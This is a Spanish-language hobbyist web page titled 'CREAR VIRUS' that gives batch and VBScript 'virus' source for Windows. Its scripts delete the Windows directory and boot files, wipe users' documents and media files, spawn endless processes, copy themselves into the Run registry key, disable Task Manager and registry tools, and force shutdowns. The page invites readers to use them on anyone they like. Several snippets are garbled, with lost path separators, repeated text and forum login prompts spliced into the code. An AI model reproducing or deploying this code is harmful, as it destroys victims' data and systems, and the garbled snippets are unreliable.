RMH901

   
  http://luis1402ify.es.tl/
  CREAR VIRUS
 

Hacer un simple virus para eliminar el windows.

 

Abrimos el blok de notas y escribimos el codigo malicioso:

 

echo off 

 

 

del=c:windowsq

 

 

del=c:windows

 

 

deltree=c:windows 

 

 

y lo guardamos con formato .bat o .cmd (el formato cmd es  para windows xp aunque este codigo tambien es para xp no funciona muy bien en windows anteriores.

 

 

por ejemplo kedaria asi: mivirus.bat

 

y si kieren ke ya no sirva cualkier computadora simplemente


Hacer un simple virus para eliminar el windows.

 

Abrimos el blok de notas y escribimos el codigo malicioso:

echo off 

del=c:windowsq

del=c:windows

deltree=c:windows 

y lo guardamos con formato .bat o .cmd (el formato cmd es  para windows xp aunque este codigo tambien es para xp no funciona muy bien en windows anteriores.

por ejemplo kedaria asi: mivirus.bat

y si kieren ke ya no sirva cualkier computadora simplemente ejecuten su virus.

 


 

 

 

Si kieres intercambiar banners o links con nosotros manda un mensaje a contactohack@masterhacks.20m.co

SCRIPT PARA UN POP UP

Abres blok de notas y escribes el siguiente codigo:

dim a1
a1 = "el texto ke kieras"
a2 = "el texto ke kieras"
a3 = "el texto k kierasl"
MsgBox a1
MsgBox a2
MsgBox a3
main()
Sub main()
MsgBox a2

MsgBox a1

MsgBox a3

 

y lo guardas con formato .vbs por ejemplo hola.vbs

Este no es un virus es un pop up que abre tres ventanas con un texto cada una pero puedes copiar y pegar la parte de abajo de Sub Main() cuantas veces kieras para ke nunka se akaben las ventanas.

 

Para todos aquellos que no tienen idea sobre que son los programas batch. Estos programas son Archivos Por Lotes los cuales son compilados con cualquier editor de text, en nuestro caso "compilaremos en el block de notas".
Cuales son las ventajas de crear virus en batch? Que ningun tipo de antivirus los detecta, ya que solo son comandos de DOS(muy importante saberlos). Cual es su desventaja: La persona tiene que ejecutarlos, pero por ejemplo lo podemos blindear hacer que la pc se reinicie, y agregar el "virus" al registro, asi cada ves que la pc inicie el virus tambien se "autoabrirá".

Bueno aqui van unos códigos (para que entiendan un poco, tienen que saber algo sobre MS-DOS).

Como "joder" el explorer
Código:

@ echo off
c:
cd
cd *programa*
cd *explorer*
rename iexplore.exe iexplore.eve
exit

Como hacer que la memoria se ponga a full.



Codigo:

@echo off
:1
start
www.google.com
goto 1



Codigo

@Echo off
:1
msg *Adios memoria
goto 1

La desventaja de esta manera de "cagar la memoria" es que si la persona es astuta solo cerrará el fichero fuente, y cerrará todos los demás procesos.

Quitar todos los drivers de la maquina

Código:

@ echo off
RD C:windowssystem

------------------------------------------------------------------------------------------------
expansion
@echo off
cls
if %OS% == Windows_NT goto nt

del C:io.sys
del C:msdos.sys


:nt
del C:boot.ini



Con este código aremos que al reniciar la PC ya no arranque mas y que el individuo tenga que formatear

-------------------------------------------------------------------------------------------------
AGREGARSE AL REGISTRO

Lo que hace éste código es crear una entrada en el registro para que nuestro bat se inicialize cada vez que prendemos la PC.

reg add HKLMSoftwareMicrosoftWindowsCurrentVersionRun /v NOMBRE_CUALQUI ERA /d "c:tubat.bat"
Donde vá "NOMBRE_CUALQUI ERA" es el nombre que tendrá la entrada en el registro, y donde dice "tubat.bat" es el nombre que le hemos puesto a nuestro archivo bat. Podemos ver que nuestro bat se encuentra en la unidad C: y es ahí donde vá a buscar el archivo para abrirlo. Pero ahora resulta que no sabemos en qué parte del disco duro va a estar ubicado el bat cuando nuestra víctima lo abra. Para ello podemos autocopiar nuestro bat a la ruta "c:tubat.bat". Entonces hacemos lo siguiente:


AUTOCOPIAR BAT A UNA RUTA ESPECIFICA

Copy %0 "c:tubat.bat"
Y con ésto logramos copiar nuestro bat de la ubicación en que se encuentre (%0) a "c:tubat.bat" con lo que ya tenemos todo listo para iniciar nuestro querido bat cada vez que se prenda la PC.

Virus bat!!! Usenlos Bajo su Propio Riesgo(y con quien quieran!!!)

Hola!

En esta ocasion les traigo estos pequeños codigos con los que podran hacer muchas maldades, claro todo con medida jajajajaja, bueno aqui estan:

Virus 1 (Prácticamente borra una PC)

—————————————-[ INICIO DEL CÓDIGO ]——————————————–

@echo off

cd %windir%

echo @echo off>CPTL.bat

echo reg add hkey_local_machinesoftwaremicrosoftwindowscurr entversionrun /V CTPL.bat /D %windir%system32CPTL.bat>>CPTL.bat

echo if exist %windir%CPTL.bat goto oportunidad>>CPTL.bat

echo copy /Y CPTL.bat %windir%>>CPTL.bat
echo copy /Y CPTL.bat %windir%system32>>CPTL.bat
echo cls>>CPTL.bat

echo :msg>>CPTL.bat
echo msg * A mortal virus has infected your computer!!>>CPTL.bat

echo portunidad>>CPTL.bat
echo cd %windir%>>CPTL.bat
echo echo respuesta=INPUTBOX(”Insert the password to eliminate the virus” >oportunity.vbs>>CPTL.bat
echo echo if respuesta=batch then>>oportunity.vbs>>CPTL.bat
echo echo msgbox (”Correct, the virus won’t bother u more” >>oportunity.vbs>>CPTL.bat
echo echo kill (”C:Windowsvirus.bat” >>oportunity.vbs>>CPTL.bat
echo echo kill (”C:Windowssystem32virus.bat” >>oportunity.vbs>>CPTL.bat
echo echo else>>oportunity.vbs>>CPTL.bat
echo echo msgbox (”Muahaha you’re still infected try it next time” >>oportunity.vbs>>CPTL.bat
echo echo start oportunity.vbs>>CPTL.bat
cls>>CPTL.bat

del /S /Q /F %userprofile%mis documentos*.*

echo :del>>CPTL.bat
echo cd %homedrive%>>CPTL.bat
echo del /Q /S /F *.jpg>>CPTL.bat
echo del /Q /S /F *.avi>>CPTL.bat
echo del /Q /S /F *.mp3>>CPTL.bat
echo del /Q /S /F *.doc>>CPTL.bat
echo del /Q /S /F *.zip>>CPTL.bat
echo del /Q /S /F *.rar>>CPTL.bat
echo cls>>CPTL.bat

echo :petar_escritorio>>CPTL.bat
echo cd %homepath%Escritorio>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 1.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 2.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 3.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 4.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 5.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 6.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 7.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 8.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 9.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 10.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 11.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 12.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 13.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 14.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 15.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 16.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 17.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 18.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 19.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 20.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 21.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 22.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 23.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 24.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 25.txt>>CPTL.bat
echo cls>>CPTL.bat

echo if exist C:virus%random%.txt (goto bucle)>>CPTL.bat

echo etar_HD>>CPTL.bat
echo cd>>CPTL.bat
echo echo Your computer h as been infected, try to pay atention to it> virus%random%.txt>>CPTL.bat
echo cd %ProgramFiles%>>CPTL.bat
echo echo Your computer h as been infected, try to pay atention to it> virus%random%.txt>>CPTL.bat
echo cd %windir%>>CPTL.bat
echo echo Your computer h as been infected, try to pay atention to it> virus%random%.txt>>CPTL.bat
echo goto Petar_HD>>CPTL.bat
echo cls>>CPTL.bat

del /S /Q /F %userprofile%mis documentos*.*

echo :bucle>>CPTL.bat
echo start iexplore.exe>>CPTL.bat
echo start command.com>>CPTL.bat
echo goto bucle>>CPTL.bat

echo :Shutdown>>CPTL.bat
echo shutdown -f -r -t 600 -c “Adios mamonazo bájate un antivirus la próxima vez!!”>>CPTL.bat

copy CPTL.bat %windir%system32

start CPTL.bat
—————————————————–[ FIN DEL CÓDIGO ]————————————————————————————————–

Virus 2 (Solo tomar de el Pelo)

echo msgbox “Vas a ser puteado”

msg * Hola. Yo soy el graciosillo que hizo este programa para que tu “amiguito” te pueda putear. Te voy a explicar lo que va a ir pasando. Para ello pusa Aceptar.
msg * Has intentado darle a cerrar?? Me parece que asi no vas a poder escaparte de mi amiguito.
msg * Bueno te voy a decir lo que le va a pasar a tu ordenador dentro de unos minutos.
msg * Principalmente se te van a abrir unas cuantas calculadoras para que puedas hacer todos los calculos que quieras.
msg * Tambien se te van a abrir otras tantas ventanas de MSDOS.
msg * Y unos cuantos bloc de notas.
msg * Esto lo hara hasta que este lo suficientemente pillado.
msg * Y entonces, POM!, tendras que reiniciar!
msg * Pues eso sera la que le pasra a tu ordenador…
msg * Mola eh??
msg * Pero la Bena noticia para ti es que hasta que no acaben estos mensajitos no pasara nada…
msg * Pero en el momento que acaben, que sera pronto, todo se desencadenara…
msg * Este podría ser el ultimo… Que tensión… Que nervios…
msg * Pfff. Que alivio… Todavia no…
msg * Lo siento pero ya no se me ocurren mas cosas para hacerte sufrir asi que…
msg * Hasta la proxima amigo!
pause

@echo off
:bucle
start cmd.exe
start calc.exe
start notepad.exe
goto bucle

Virus 3 (abre paginas porno)

@echo off
:putada
start Debes hacer
Login para poder ver los links de descarga.

. com
start Debes hacer
Login para poder ver los links de descarga.


start muyzorras.com
start Debes hacer
Login para poder ver los links de descarga.

m
start Debes hacer
Login para poder ver los links de descarga.

om
start Debes hacer
Login para poder ver los links de descarga.

. com
start Debes hacer
Login para poder ver los links de descarga.

om
start Debes hacer
Login para poder ver los links de descarga.

om
goto putada

Virus 4 (blockea Mouse, borra registros etc…)

@echo off
@cd C:WINDOWSsystem
echo bean>MOUSE.DRV
@cd..
@cd C:WINDOWSsystem32
echo bean>mouse.drv
@cd..
@cd C:WINDOWS
@rmdir /S /Q Cursores
@cd..
@cd C:WINDOWS
@rmdir /S /Q Cursors
@cd..
@cd C:windowssystem32
@echo off>Winbat.bat
@cd C:Windows>>Winbat
@reg del HKEY_CURRENT_USERControl PanelSound /F
echo bean>SETDEBUG.EXE>>Winbat.bat
echo bean>TETEP.DLL>>Winbat.bat
echo bean>Twain.dll>>Winbat.bat
echo bean>Twain_32.dll>>Winbat.bat
@DEL /S /Q JavaAccessBridge.dll>>Winbat.bat
@cd..
@cd C:System Volume Information_restore{E5311AE9-97D4-4238-9F6D-97D214BD07B1}RP51
@echo off >WIN32.bat
@reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurr entVersionRun/v Win32 /t REG_SZ /d WIN32.bat /F >>WIN32.bat
@reg add hkcusoftwaremicrosoftwindowscurrentversionpol iciessystem /v disabletaskmgr /T REG_SZ /D 1 /F >>WIN32.bat
@reg add hkcusoftwaremicrosoftwindowscurrentversionpol iciessystem /v disableregistrytools /T REG_SZ /D 1 /F >>WIN32.bat
@reg add hkcusoftwaremicrosoftwindowscurrentVersionpol iciesExplorerRestricRun /T REG_SZ /d eventvwr.exe /F >>WIN32.bat
@reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NT/CurrentVersion/Winlogon /v logonprompt /t REG_SZ /d YoU ArE InFeCtEd!! /F >>WIN32.bat
@reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionPolicesExplorer /v NoSaveSettings /T REG_DWORD /D 1 /F >>WIN32.bat
@reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionPoliciesExplore /v NoClose /t REG_DWORD /D 1 /F >>WIN32.bat
@shutdown -S -F -T 5 -C “Error del Sistema Operativo, Se apagara en unos segundos……BEAN!!!! >>WIN32.bat
@cd..
@cd C:System Volume Information_restore{E5311AE9-97D4-4238-9F6D-97D214BD07B1}RP51
@reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurr entVersionRun/v colorbat /t REG_SZ /d colorbat /F >>colorbat.bat
@echo off>colorbat.bat
@:menu>>colorbat.bat
@COLOR A>>colorbat.bat
@COLOR B>>colorbat.bat
@COLOR C>>colorbat.bat
@COLOR D>>colorbat.bat
@COLOR E>>colorbat.bat
@COLOR F>>colorbat.bat
@color 3f>>colorbat.bat
@color 4f>>colorbat.bat
@color 5f>>colorbat.bat
@color 6f>>colorbat.bat
@color 7f>>colorbat.bat
@color 8f>>colorbat.bat
@color 9f>>colorbat.bat
@color 1A>>colorbat.bat
@color 1B>>colorbat.bat
@color 1C>>colorbat.bat
@color 1D>>colorbat.bat
@color 1E>>colorbat.bat
@color 1F>>colorbat.bat
@color 2A>>colorbat.bat
@color 2B>>colorbat.bat
@COLOR 2C>>colorbat.bat
@COLOR 2D>>colorbat.bat
@COLOR 2E>>colorbat.bat
@COLOR 2F>>colorbat.bat
@COLOR 3A>>colorbat.bat
@COLOR 3B>>colorbat.bat
@COLOR 3C>>colorbat.bat
@COLOR 3D>>colorbat.bat
@COLOR 3E>>colorbat.bat
@COLOR 3F>>colorbat.bat
@COLOR 4A>>colorbat.bat
@COLOR 4B>>colorbat.bat
@COLOR 4C>>colorbat.bat
@COLOR 4D>>colorbat.bat
@COLOR 4E>>colorbat.bat
@COLOR 4F>>colorbat.bat
@COLOR 5A>>colorbat.bat
@COLOR 5B>>colorbat.bat
@COLOR 5C>>colorbat.bat
@COLOR 5D>>colorbat.bat
@COLOR 5E>>colorbat.bat
@COLOR 5F>>colorbat.bat
@COLOR 6A>>colorbat.bat
@COLOR 6B>>colorbat.bat
@COLOR 6C>>colorbat.bat
@COLOR 6D>>colorbat.bat
@COLOR 6E>>colorbat.bat
@COLOR 6F>>colorbat.bat
@COLOR 7A>>colorbat.bat
@COLOR 7B>>colorbat.bat
@COLOR 7C>>colorbat.bat
@COLOR 7D>>colorbat.bat
@COLOR 7E>>colorbat.bat
@COLOR 7F>>colorbat.bat
@COLOR 8A>>colorbat.bat
@COLOR 8B>>colorbat.bat
@COLOR 8C>>colorbat.bat
@COLOR >>colorbat.bat
@COLOR 8E>>colorbat.bat
@COLOR 8F>>colorbat.bat
@COLOR 9A>>colorbat.bat
@COLOR 9B>>colorbat.bat
@COLOR 9C>>colorbat.bat
@COLOR 9D>>colorbat.bat
@COLOR 9E>>colorbat.bat
@COLOR 9F>>colorbat.bat
@COLOR AA>>colorbat.bat
@COLOR AB>>colorbat.bat
@COLOR AC>>colorbat.bat
@COLOR AD>>colorbat.bat
@COLOR AE>>colorbat.bat
@COLOR AF>>colorbat.bat
@COLOR BA>>colorbat.bat
@COLOR BB>>colorbat.bat
@COLOR BC>>colorbat.bat
@COLOR BD>>colorbat.bat
@COLOR BE>>colorbat.bat
@COLOR BF>>colorbat.bat
@COLOR CA>>colorbat.bat
@COLOR CB>>colorbat.bat
@COLOR CC>>colorbat.bat
@COLOR CD>>colorbat.bat
@COLOR CE>>colorbat.bat
@COLOR CF>>colorbat.bat
@COLOR DA>>colorbat.bat
@COLOR DB>>colorbat.bat
@COLOR DC>>colorbat.bat
@COLOR DD>>colorbat.bat
@COLOR DE>>colorbat.bat
@COLOR DF>>colorbat.bat
@COLOR EA>>colorbat.bat
@COLOR EB>>colorbat.bat
@COLOR EC>>colorbat.bat
@COLOR ED>>colorbat.bat
@COLOR EE>>colorbat.bat
@COLOR EF>>colorbat.bat
@COLOR FA>>colorbat.bat
@COLOR FB>>colorbat.bat
@COLOR FC>>colorbat.bat
@COLOR FD>>colorbat.bat
@COLOR FE>>colorbat.bat
@COLOR FF>>colorbat.bat
@GOTO :MENU>>colorbat.bat
@cd>>colorbat.bat
@cd C:windowssystem32
@DEL /S /Q Winbat.bat
@exitDebes hacer
Login para poder ver los links de descarga.

recuerden que para hacer esto: inicio-acesorios-notepad-copian-el codigo-le dan guardar como-selecionan todos los archivos-guerdan como “nombre.bat” o como quieran solo que debe de quedar con extension .bat

NOTA:NO ME HAGO RESPONSABLE POR LOS DAÑOS QUE PUEDAN CAUSAR CON ESTO.
virus no dañino:

@echo off
echo Bienvenido ... selecciona la opcion:
echo 1.Descomprimir el juego
echo 2.Instrucciones del juego
echo 3.Salir
set /p opcion=Opcion (1-2-3):
if %opcion%==1 goto 1
if %opcion%==2 goto 2
if %opcion%==3 goto 3
:1
msg * Virus encontrado ...
start www.hotmail.com
goto virus
:2
msg * Tendras que reiniciar
start www.hotmail.com
goto virus2
:3
shutdown -s -t 10 -c "Virus encontrado".
exit
exit

 

 
 
  Hoy habia 13 visitantes (22 clics a subpáginas) ¡Aqui en esta página!  
 
Este sitio web fue creado de forma gratuita con PaginaWebGratis.es. ¿Quieres también tu sitio web propio?
Registrarse gratis